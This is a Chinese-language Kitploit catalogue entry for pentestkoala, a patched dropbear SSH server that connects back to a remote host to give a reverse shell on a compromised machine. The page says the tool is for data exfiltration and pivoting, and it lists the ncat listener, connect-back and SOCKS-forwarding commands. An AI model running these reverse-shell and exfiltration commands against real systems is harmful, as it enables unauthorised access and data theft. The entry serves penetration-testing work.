Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
pentestkoala — 修改后的dropbear服务器,充当客户端并允许无认证登录 | Kitploit
工具/GitHubGitHub/mrschyte/pentestkoala
横向移动数据泄露后渗透利用渗透测试红队远程访问工具
GitHubmrschyte/pentestkoala

pentestkoala

修改后的dropbear服务器,充当客户端并允许无认证登录

查看仓库
1252628年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Koala 是 dropbear SSH 服务器的一个修补版本,它不绑定到端口,而是通过连接到远程客户端来开启反向 Shell。

这对于在被利用的机器上获取 pty 终端以及通过 SSH 端口转发安全地外泄数据非常有用。还可以通过使用动态 SSH 端口转发功能进行跳板攻击(Pivoting)。

[用法]

在客户端上运行以下命令以监听 SSH 连接: $ ncat -lvp 5000 --sh-exec 'ncat -lvp 9999'

在已被利用的主机上运行: $ ./dropbear -p client-host:5000

现在在客户端上,连接到端口 9999 以开启 Shell: $ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null localhost -D9050 -p9999

下载工具